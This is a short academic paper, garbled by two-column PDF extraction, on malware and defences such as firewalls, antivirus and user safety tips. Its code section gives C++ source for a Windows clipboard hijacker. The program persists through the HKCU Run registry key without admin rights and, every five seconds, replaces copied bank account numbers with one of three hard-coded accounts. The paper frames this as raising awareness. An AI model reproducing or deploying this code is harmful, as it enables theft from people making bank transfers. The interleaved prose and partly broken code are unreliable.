Malware (a portmanteau for malicious software) is a software designed to cause damage to a computer, server, client, or computer network. These malicious programs can be made to steal, encrypt or delete users' data, alter or hijack core computing functions and monitor users' computer activity without their permission. Malware authors can spread their software using variety of means. For example they can use USB drive but also an email or over the internet through drive-by downloads. In this work the malware target is to change copied bank account to the hacker one and to add itself to the registry without the need of administrator privileges. The program was made using standard Microsoft C++ libraries included in Visual Studio.
ifnd malware tracks by using permission requests and API calls from the registry of your mobile device. One The history of hacking is reaching 1960s. At first the of methods to steal the information from computer term “hacker” was used to describe people that were user is to attract the attention by other accepted acspending all day programming and doing things no tion, while in the background the important data is one ever thought is possible (like now “geek” or “nerd”) stolen. In [3] was discussed how this type of attack but after some time it changed more and more to de- can be done by using pdf-based model in which the pdf scribe people that find bugs in the code , or a system, is containing the virus code, so when the user opens it to exploit them and potentially use for criminal pur- the action to swap information is taken. In [4] was prepose. Nowadays hackers are divided into “White hats”, sented a wide range of definitions and examples from “Black hats” and “Grey hats”. White hats are the “good various areas. There are various areas where attack guys” that are finding bugs and working with the pro- can cause a lot of damage. One of them is medical ingrammers to fix them, and in the end make the soft- ternet of things [5]. In this area the fight is not just ware more secure. Black hats on the other hand are us- for money but very often for human life. An interesting vulnerabilities for their own purpose, often steal- ing discussion an recent advances and new challenges ing money or destroying victims computer. Grey hats for malware in medical environments was presented are hobbyists that hack for fun. They usually don’t in [6]. steal money but can make very annoying viruses to The science work toward detection and prevention “troll” people and make them think about their secu- from these attack. One of the most eficient mecharity. Sometimes they may help to fix the bug but it’s nisms are based on the latest ideas sourced in artinot their main goal. ifcial intelligence. Neural networks and bio inspired
Nowadays, as computers are becoming much more mechanisms serve are detectors of malware or
propopular and easy to buy, and the Internet is widely tectors from information lost. In [
While [14] discussed how to use graph based model to Programs which have admin privileges can do acanalyze attack, where the stages of the malware are de- tually anything and are easy to make because there ifned in decision model levels. There are several pos- are no limitations, but these are less successful. The sibilities to attack computer users and several ways to reason is simple – not all users have administrator acdetect them. All depends on the ability to analyze the count and if they have, most of them are not allowing actions. In each of the domains the attack has diferent every application to have the access. The biggest probaspects, therefore the method of prevention should be lem here is a social engineering and making the prooriented on those spacial details to win the fight with gram look as appealing as possible to make people run the virus. it. So the user is convinced that the program is original
In this paper a code sample with experiments and one, while in fact the used program is just a fake one the action design are discussed to show weak and strong with highest similarity developed to steal the inforpoints in each of attacks. The discussion shows which mation. The second option is more dangerous but reof potential areas are most vulnerable, at the same time quires high understanding of security of the operating presenting how we can detect or prevent unwanted system and programming. If done correctly, doesn’t actions. As an example a schema of banking account even need interaction from the user. A schematic atswapping is discussed, since this issue can be the most tack option is presented in Fig. 1 important for everyday user of the internet.
It’s a "shield" that protects us from dangers coming from the Internet or even our own local network. It works by controlling incoming and outgoing network • one that needs administrator privileges to run trafic based on predetermined security rules[15]. It (user must accept installation and launch of that is very useful because it may prevent attack via Interprogram and must be an administrator) net and installing the malware remotely and forces the hacker to either have a physical contact with our com- Third Generation: Application Layer An appliputer or to deceive us to install the software. cation firewall is a form of firewall that controls input, output, and/or access from, to, or by an appliFirst Generation: Packet Filters The first reported cation or service. It operates by monitoring and potype of network firewall is called a packet filter. Packet tentially blocking the input, output, or system service iflters act by inspecting packets transferred between calls that do not meet the configured policy of the firecomputers. When a packet does not match the packet wall. The application firewall is typically built to coniflter’s set of filtering rules, the packet filter either drops trol all network trafic on any OSI layer up to the ap(silently discards) the packet, or rejects the packet (dis- plication layer. It is able to control applications or sercards it and generates an Internet Control Message Pro- vices specifically[17]. tocol notification for the sender) else it is allowed to pass[15]. It may work in diferent ways. For exam- 3.2. Anti-Virus and Anti-Malware ple it may block ports that are known to have security Software issues or protocols that are classified as not safe.
Second Generation: Stateful Filters The next step ware is anti-virus. Antivirus software is a type of
proin firewall evolution came with the stateful packet fil- gram designed to protect computers from malware like
tering firewall (or the stateful inspection firewall as viruses, computer worms, spyware, botnets, rootkits,
it is often referred to). This type of firewall has the keyloggers and such. Antivirus programs function can
same limitations as the static packet filtering firewall, scan, detect and remove viruses from your computer
with the exception of being state-aware. The stateful [18]. A specific component of anti-virus and
anti-malpacket filter still operates at the network layer of the ware software, commonly referred to as an on-access
OSI model, although some may extend into the trans- or real-time scanner, hooks deep into the operating
port layer (layer 4) to collect state information. De- system’s core or kernel and functions in a manner
simspite the stateful packet filter being application-unaware, ilar to how certain malware itself would attempt to
opit does ofer limited advantages over the basic static erate, though with the user’s informed permission for
packet filter[
There are a lot of other ways to protect us but one of the most important thing that will protect us from hackers is common sense. For example installing illegal software and downloading things that are normally paid "for free" from the Internet is a good way to download also some viruses and other malicious software on the same occasion. Therefore it is recommended to only download the oficial releases of software directly from the producer web page. Also clicking weird links from unknown emails or SMS’s is also a very bad idea. Some basic tips for keeping yourself safe: • Keep operating systems and application software up to date • Install and regularly update anti-virus and firewall protection on all computers • Set your browser to use medium or high security settings and to automatically install updates • Turn on the pop-up blocker • If you use social media, don’t share your full email contact list – it could lead to you and your contacts receiving spam and phishing e-mails[20]
ample of a function developed to add the registry key to launch the application with the OS startup without need of administrator privileges. As an example we present how to use simple system requirements to change logs of the system for the malware of banking.
BOOL RegisterMyProgramForStartup(PCWSTR pszAppName, PCWSTR pathToExe, PCWSTR args) { //first we create variables //later used in the program //we initiate them with deafault values
HKEY hKey = NULL; LONG lResult = 0; BOOL fSuccess = TRUE; DWORD dwSize; wcscat_s(szValue, count, pathToExe); wcscat_s(szValue, count, L"\" "); if (args != NULL) { wcscat_s(szValue, count, args); //here we need to create a new registry key lResult = RegCreateKeyExW(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\ CurrentVersion \\Run", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &hKey, NULL); fSuccess = (lResult == 0); //if succeeded we set the key’s value //to point our malware if (fSuccess) { dwSize = (wcslen(szValue) + 1) * 2; lResult = RegSetValueExW(hKey, pszAppName, 0, REG_SZ, (BYTE*)szValue, dwSize); fSuccess = (lResult == 0); //in the end we close the registry if (hKey != NULL) { RegCloseKey(hKey); hKey = NULL; //we return the status of the function return fSuccess; void RegisterProgram() { wchar_t szPathToExe[MAX_PATH]; GetModuleFileNameW(NULL, szPathToExe, MAX_PATH); //here we launch our function //to add program to registry RegisterMyProgramForStartup( L"converter", szPathToExe, L"-foobar");
The second thing was the main algorithm changing copied bank account to the one we specify. This code is pretty simple. The ClipboardChanger() function is called every 5 seconds (can be changed to any value in the code) and if the copied text is a bank account it changes it for one of the 3 accounts written in the code. If not nothing happens. void ClipboardChanger() { //here we declare our variables //and set the default values char *buffer = NULL; CString fromClipboard; CString source = ""; HWND hwnd = GetClipboardOwner(); if (OpenClipboard(hwnd)) { //if opening the clipboard works //we copy the text to //fromClipboard variable
HANDLE hData = GetClipboardData(CF_TEXT); char* buffer = (char *)GlobalLock(hData); fromClipboard = buffer; //here we check if copied text //is a correct bank account if ((is_account(fromClipboard) == true)) { //here we randomly pick one of //3 specified accounts int random = (rand() % 3) + 1; if (random == 1) {
source = "106000760000320000057153"; } else if (random == 2) { } else if (random == 3) {
source = "106000760000320000057154"; else source = "106000760000320000057155"; source = ""; source = fromClipboard; } [1] hacking-statistics, 2020. URL: https: //hostingtribunal.com/blog/hacking-statistics/ //here we clear the clipboard #gref.
HGLOBAL clipbuffer; [2] M. Alazab, M. Alazab, A. Shalaginov, A. Mesleh, EmptyClipboard(); A. Awajan, Intelligent mobile malware detection using permission requests and api calls, Future //the rest of the code sets the Generation Computer Systems 107 (2020) 509– //clipboard buffer for the one 521. //we want [3] D. Maiorca, B. Biggio, G. Giacinto, Towards clipbuffer = GlobalAlloc(GMEM_DDESHARE, adversarial malware detection: Lessons learned source.GetLength() + 1); from pdf-based attacks, ACM Computing Surveys (CSUR) 52 (2019) 1–36. buffer = (char*)GlobalLock(clipbuffer); [4] O. Suciu, S. E. Coull, J. Johns, Exploring adversarstrcpy(buffer, LPCSTR(source)); ial examples in malware detection, in: 2019 IEEE GlobalUnlock(hData); Security and Privacy Workshops (SPW), IEEE, GlobalUnlock(clipbuffer); 2019, pp. 8–14.
SetClipboardData(CF_TEXT, clipbuffer); [5] F. Beritelli, A. Spadaccini, A statistical approach
CloseClipboard(); to biometric identity verification based on heart
} sounds, in: Proceedings - 4th International
Con} ference on Emerging Security Information,
Systems and Technologies, SECURWARE 2010, 2010,
The above is_account() function for performance rea- pp. 93–96.
sons checks if the copied text has the right length, then [6] M. Wazid, A. K. Das, J. J. Rodrigues, S. Shetty,
if all characters are numbers and in the end computes Y. Park, Iomt malware detection approaches:
the control sum to be sure if the bank account is cor- Analysis and research challenges, IEEE Access
rect or it’s just a very large number. (2019).
[
R. Maskeliu¯nas, Bio-inspired voice evaluation 5. Conclusions mechanism, Applied Soft Computing 80 (2019) 342–357.
The whole idea of presented attack is defined in block [8] M. Wozniak, D. Polap, G. Borowik, C. Napoli, A chart shown in Fig. 3. By analyzing this schema we ifrst attempt to cloud-based user verification in can see how the malware software may attack and which distributed system, in: 2015 Asia-Pacific Conwould be potential weak points in the system or com- ference on Computer Aided System Engineering, munication with the user. In Fig. 4 we can see how IEEE, 2015, pp. 226–231. the time of processing is related to the length of input [9] M. Woźniak, D. Połap, Intelligent home systems data strings. for ubiquitous user support by using neural net
This article’s main goal is to show that creating that works and rule based approach, IEEE Transackind of malware is easy, so everyone can write it not tions on Industrial Informatics (2019). only for scientific reasons but also with bad intentions [10] G. Lo Sciuto, S. Russo, C. Napoli, A cloud-based in mind. That’s why we should build our awareness lfexible solution for psychometric tests validaand protect ourselves from hackers. This is why we tion, administration and evaluation, in: CEUR